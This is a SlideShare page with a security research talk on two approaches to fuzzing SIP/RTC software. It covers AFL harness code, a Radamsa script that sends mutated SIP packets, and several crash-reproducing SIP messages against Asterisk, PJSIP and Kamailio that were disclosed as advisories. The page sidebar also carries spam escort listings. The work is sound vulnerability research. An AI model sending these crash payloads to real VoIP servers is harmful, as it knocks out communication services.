Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Scanning The Intertubes For Voip
Scanning The Intertubes For VoipScanning The Intertubes For Voip
Scanning The Intertubes For VoipSandro Gauci
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Sandro Gauci
 

Plus de Sandro Gauci (7)

CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
 
TADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform downTADSummit 2022 - How to bring your own RTC platform down
TADSummit 2022 - How to bring your own RTC platform down
 
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo serverTools for offensive RTC Security: introducing SIPVicious PRO and the demo server
Tools for offensive RTC Security: introducing SIPVicious PRO and the demo server
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC edition
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Scanning The Intertubes For Voip
Scanning The Intertubes For VoipScanning The Intertubes For Voip
Scanning The Intertubes For Voip
 
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
Troopers09: The Truth about Web Application Firewalls: What the vendors do NO...
 

Dernier

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 

Dernier (20)

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 

A tale of two RTC fuzzing approaches

  • 1. A tale of two RTC fuzzing approaches 1 / 41
  • 2. Agenda 1. Introduction 2. First approach: instrumentation with AFL 3. Second approach: built a smart fuzzer 4. Conclusion 2 / 41
  • 4. About us and our story Sandro Gauci original author of SIPVicious Penetration Tester & Security Researcher behind Enable Security GmbH Alfred Farrugia often works with Enable Security enjoys building fuzzers and using them this is mostly his fault ;-) 4 / 41
  • 5. Our story and aim of this presentation been fuzzing software as a side-project and also professionally for a while tried different approaches with RTC software aim is to describe our tests; both our failures and the few successes 5 / 41
  • 6. Fuzzing RTC? What (wtf is fuzzing)? Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Wikipedia 6 / 41
  • 7. Why (bother with) RTC? Considered to be critical infrastructure Exposed to potential attackers Downtime causes major losses Not many people seem to be doing it 7 / 41
  • 8. First approach Trying different experiments American Fuzzy Lop (AFL) looked particularly attractive 8 / 41
  • 11. Why AFL? Uses very efficient techniques: compile-time instrumentation genetic algorithms is solid and widely used 11 / 41
  • 12. How do you use AFL to fuzz RTC systems? AFL is great when fuzzing tools that take file input e.g. ffmpeg or tcpdump AFL is not so great when it comes to fuzzing anything that doesn't take file input (e.g. servers) Major hurdle is wiring the target code so that it can be fuzzed with AFL Example 1: Asterisk: due to its modular system, we had problems testing specific modules; we ended up copying whole code to be able to load the modules Example 2: Kamailio: easier to wire it for fuzzing, except that building it with the compile-time instrumentation for AFL was painful 12 / 41
  • 13. Easy way out Fuzz what requires less effort! Libraries typically have a test harness Easier to isolate code that needs to be tested 13 / 41
  • 14. How do you use AFL to fuzz RTC systems? Need a corpora .. INVITE sip:7170@iptel.org SIP/2.0 Via: SIP/2.0/UDP 195.37.77.100:5040; rport Max-Forwards: 10 From: <sip:jiri@iptel.org> To: <sip:jiri@bat.iptel.org> Call-ID: d10815e0-bf17-4afa-8412-d9130a793d96@213.20.128.35 CSeq: 2 INVITE Contact: <sip:213.20.128.35:9315> User-Agent: Windows RTC/1.0 Content-Type: application/sdp Content-Length: 451 ... 14 / 41
  • 15. And a harness .. example with AFL and PJSIP Test tool from PJSIP's samples modified to use AFL persistent mode, based off pjsip- apps/src/samples/sipstateless.c static void init_media_type (pjsip_media_type * mt, char *type, char *subtype, char *boundary) { /* removed */ } int main (int argc, char *argv[]) { // initialization here pool = pjsip_endpt_create_pool (sip_endpt, NULL, 512, 512); init_media_type (&ctype, "multipart", "mixed", "12345"); while (__AFL_LOOP(1000)) { char testmsg[10240] = { 0 }; fread (testmsg, 1, 10240, stdin); pj_strdup2_with_null (pool, &str, testmsg); body = pjsip_multipart_parse (pool, str.ptr, str.slen, &ctype, 0); if (!body) { printf ("cannot be parsed!n"); } } } 15 / 41
  • 16. Which created a message similar to this INVITE sip:2565551100@one.example.com SIP/2.0 Via: SIP/2.0/UDP sip.example.com;branch=7c337f30d7ce.1 From: "Alice, A," <sip:bob@example.com> To: Bob <sip:bob@example.com> Call-ID: 602214199@mouse.wonderland.com CSeq: 1 INVITE Contact: Alice <sip:alice@mouse.wonderland.com> content-type: multipart/mixed;`boundary=++ -- --++=AAA xxx --+ Note that the above SIP message only contains new lines (i.e. n) and no carriage returns (i.e. r). 16 / 41
  • 17. Which led to this crash gdb --args asterisk -c .... Asterisk Ready. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fffd6b85700 (LWP 2625)] 0x00007ffff783fd4c in parse_multipart_part (pool=0x1dff930, start=0x7ffff0004359 "--++=Discussion of Mbone Engineering Issuesne=mbone@somewhere.com nc=IN IP4 224.2.0.1/127nt=0 0nm=audio 3456 RTP/AVP 0na=rtpmapt...n--+", len=18446744073709551615, pct=0x1dffd60) at ../src/pjsip/sip_multipart.c:435 435 while (p!=end && *p!='n') ++p; 17 / 41
  • 18. AFL and Kamailio #include "core/parser/msg_parser.h" int main() { if (fuzz_init_memory() != 0) goto error; static char buf [maxsize] = {0}; struct sip_msg* msg; set_local_debug_level(-250); int i; for (i=0; i<maxsize; i++) buf[i] = 0; while (__AFL_LOOP(1000)) { msg=pkg_malloc(sizeof(struct sip_msg)); memset(msg,0, sizeof(struct sip_msg)); int len = read(0, buf, maxsize-2); buf[len] = 0 len += 1; buf[len] = 0; len += 1; str inb; inb.s = buf; inb.len = len; len = inb.len; msg->buf=buf; msg->len=len; if (parse_msg(buf,len, msg) == 0) { parse_headers(msg, HDR_FROM_F|HDR_TO_F|HDR_CALLID_F|HDR_CSEQ_F, 0); } free_sip_msg(msg); pkg_free(msg); } } 18 / 41
  • 19. AFL and Kamailio No issues in Kamailio found when taking this approach 19 / 41
  • 20. Alternative approach with Radamsa Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer echo "aaa" | radamsa aaaa echo "aaa" | radamsa ːaaa echo "Fuzztron 2000" | radamsa --seed 4 Fuzztron 4294967296 echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4 1 + (2 + (2 + (3 + 4?) 1 + (2 + (3 +?4)) 18446744073709551615 + 4))) 1 + (2 + (3 + 170141183460469231731687303715884105727)) 20 / 41
  • 21. Alternative approach with Radamsa using Radamsa with replay immediate result: CSeq issue in PJSIP 21 / 41
  • 22. Alternative approach with Radamsa The following OPTIONS message reproduced: OPTIONS sip:localhost:5060 SIP/2.0 From: <sip:test@localhost> To: <sip:test2@localhost> Call-ID: aa@0000000000 CSeq: 0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAA Via: SIP/2.0/UDP 195.37.78.177:5060 Contact: <sip:test@localhost> Content-Length: 0 22 / 41
  • 23. Alternative approach with Radamsa Result: Asterisk Malloc Debugger Started (see /opt/asterisk/var/log/asterisk/mmlog)) Asterisk Ready. [Apr 11 23:52:41] NOTICE[18382]: res_pjsip/pjsip_distributor.c:536 log_failed_request: Request 'OPTIONS' from '<sip:test@localhost>' failed for '10.0.2.2:44779' (callid: aa@0000000000) - No matching endpoint found ^CAsterisk cleanly ending (0). Executing last minute cleanups == Destroying musiconhold processes == Manager unregistered action DBGet == Manager unregistered action DBPut == Manager unregistered action DBDel == Manager unregistered action DBDelTree WARNING: High fence violation of 0x7ff0640058d0 allocated at ../src/pj/pool_policy_malloc.c default_block_alloc() line 46 WARNING: Memory corrupted after free of 0x7ff064006970 allocated at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @0000000000$195.37.78.177:5060$ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA...AAA$0$$aa@0000000000$195.37.78.177:5060$() line 1094795585 Segmentation fault 23 / 41
  • 24. Script to produce this issue def radamsafuzz(input): p = Popen(['radamsa'], stdin=PIPE, stdout=PIPE) p.stdin.write(input) out, err = p.communicate() return out def register(_from, _to, callid, useragent, cseq, via, contact, contentlength): return 'REGISTER sip:voip.net:5060 SIP/2.0rn' + 'From: %srn' % _from + 'To: %srn' % _to + 'Call-ID: %srn' % callid + 'User-Agent: %srn' % useragent + 'CSeq: %srn' % cseq + 'Via: %srn' % via + 'Contact: %srn' % contact + 'Content-Length: %srn' % contentlength + 'rn' HOST = '10.0.2.15' PORT = 5060 while True: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((HOST, PORT)) while v is None: fuzz_register[key] = radamsafuzz(fuzz_register[key]) dt = register(**fuzz_register) with open('payload/%i.raw' % ix, 'wb') as fout: fout.write(dt) s.sendall(dt) 24 / 41
  • 25. More experiments with this alternative approach Little effort, worked surprisingly well Tried the same approach with Asterisk chan_skinny, did not get too far Similar issue with FreeSWITCH 25 / 41
  • 26. chan_skinny couldn't be fuzzed 26 / 41
  • 27. Reported back to Asterisk project Issued 3 advisories: Heap overflow in CSEQ header parsing affects Asterisk chan_pjsip and PJSIP Out of bound memory access in PJSIP multipart parser crashes Asterisk Asterisk Skinny memory exhaustion vulnerability leads to DoS 27 / 41
  • 28. Second approach inspired by the CSeq finding in PJSIP smart fuzzer, one that knows the target protocols started building and ended up with two tools: estoolkit gasoline 28 / 41
  • 29. Second approach: estoolkit build environments on top of docker quickly switch through different configurations e.g. ./run.sh 5.1.3 cli config/default and ./run.sh 5.1.3 gdb config/default gdb mode is especially useful 29 / 41
  • 30. Second approach: gasoline the fuzzer agnostic to which mutation engine we use initial support for radamsa, zzuf added later minimal SIP and RTP library targeted towards fuzzing so we could actually create a call, a dialog, authenticate 30 / 41
  • 31. What did we test? Asterisk with chan_sip .. no results Asterisk with pjsip rtpproxy .. only tested basic default config rtpengine .. only tested basic default config kamailio .. one finding; only tested basic default config voipmonitor (tip: enable the Live Sniffer) customer systems/code 31 / 41
  • 32. Public ndings - Kamailio REGISTER sip:localhost:5060 SIP/2.0 Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394 To: <sip:1@localhost:5060> From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg Call-ID: 8b113457-c6a6-456a-be68-606686d93c38 Contact: sip:1@127.0.0.1:53497 Max-Forwards: 70 CSeq: 10086 REGISTER User-Agent: go SIP fuzzer/1 Content-Length: 0 32 / 41
  • 33. Public ndings - Asterisk / PJSIP (1) SUBSCRIBE sip:3000@127.0.0.1:5060 SIP/2.0 To: <sip:3000@127.0.0.1:5060> From: Test <sip:3000@127.0.0.1:5060> Call-ID: 1627b84b-b57d-4256-a748-30d01d242199 CSeq: 2 SUBSCRIBE Via: SIP/2.0/TCP 172.17.0.1:10394;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199 Contact: <sip:3000@172.17.0.1> Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (REPEAT ACCEPT FOR 50 TIMES) Event: message-summary Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e Content-Length: 0 33 / 41
  • 34. Public ndings - Asterisk / PJSIP (2) INVITE sip:5678@127.0.0.1:5060 SIP/2.0 To: <sip:5678@127.0.0.1:5060> From: Test <sip:5678@127.0.0.1:5060> Call-ID: adc9caea-2d0a-40af-9de5-1dd21387e03a CSeq: 2 INVITE Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bKadc9caea-2d0a-40af-9de5-1dd21387e03a Contact: <sip:5678@172.17.0.1> Content-Type: application/sdp Content-Length: 228 v=0 o=- 1061502179 1061502179 IN IP4 172.17.0.1 s=Asterisk c=IN IP4 172.17.0.1 t=0 0 m=audio 17000 RTP/AVP 9 0 101 a=rtpmap:8 alaw/8000 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=fmtpx00:101 0-16 a=sendrecv 34 / 41
  • 35. Public ndings - Asterisk / PJSIP (3) INVITE sip:5678@127.0.0.1:5060 SIP/2.0 To: <sip:5678@127.0.0.1:5060> From: Test <sip:5678@127.0.0.1:5060> Call-ID: 5493d4c9-8248-4c26-a63c-ee74bcf3e1e8 CSeq: 2 INVITE Via: SIP/2.0/UDP 172.17.0.1:10394;branch=z9hG4bK5493d4c9-8248-4c26-a63c-ee74bcf3e1e8 Contact: <sip:5678@172.17.0.1> Content-Type: application/sdp Content-Length: 115 v=0 o=- 1061502179 1061502179 IN IP4 172.17.0.1 s=Asterisk c=IN IP4 172.17.0.2 m=audio 17002 RTP/AVP 4294967296 35 / 41
  • 36. And also, issues that stop us from fuzzing Asterisk exhibited a crash when sending a repeated number of INVITE messages over TCP or TLS transport. We reported this as well. 36 / 41
  • 37. Gasoline vs Kamailio, in action 37 / 41
  • 38. What else and what is next? Also looking at other protocols, especially STUN / TURN Will probably look again at compile-time instrumentation / AFL / Libfuzzer approach Looking for non-crash vulnerabilities, e.g. authentication bypass dialplan bypass memory disclosure / leak vulnerabilities (similar to Heartbleed) 38 / 41
  • 39. Conclusion AFL approach requires a lot of setting up and customizations Would be great if the developers would provide tools, samples and documentation to aid with this Some already are (I only know of non-RTC devs who do this) including fuzzing support See Google's OSS-Fuzz and it's ideal integration document The second approach allows us to do blackbox testing without access to source code Appears to be surprisingly effective 39 / 41
  • 40. Conclusion - ideal integration Every fuzz target: Is maintained by code owners in their RCS (Git, SVN, etc). Is built with the rest of the tests - no bit rot! Has a seed corpus with good code coverage. Is continuously tested on the seed corpus with ASan/UBSan/MSan Is fast and has no OOMs Has a fuzzing dictionary, if applicable stolen from https://github.com/google/oss-fuzz/blob/master/docs/ideal_integration.md 40 / 41
  • 41. Q&A ? Get in touch sandro at enablesecurity dot com https://enablesecurity.com https://sipvicious.pro && https://sipvicious.org @sandrogauci 41 / 41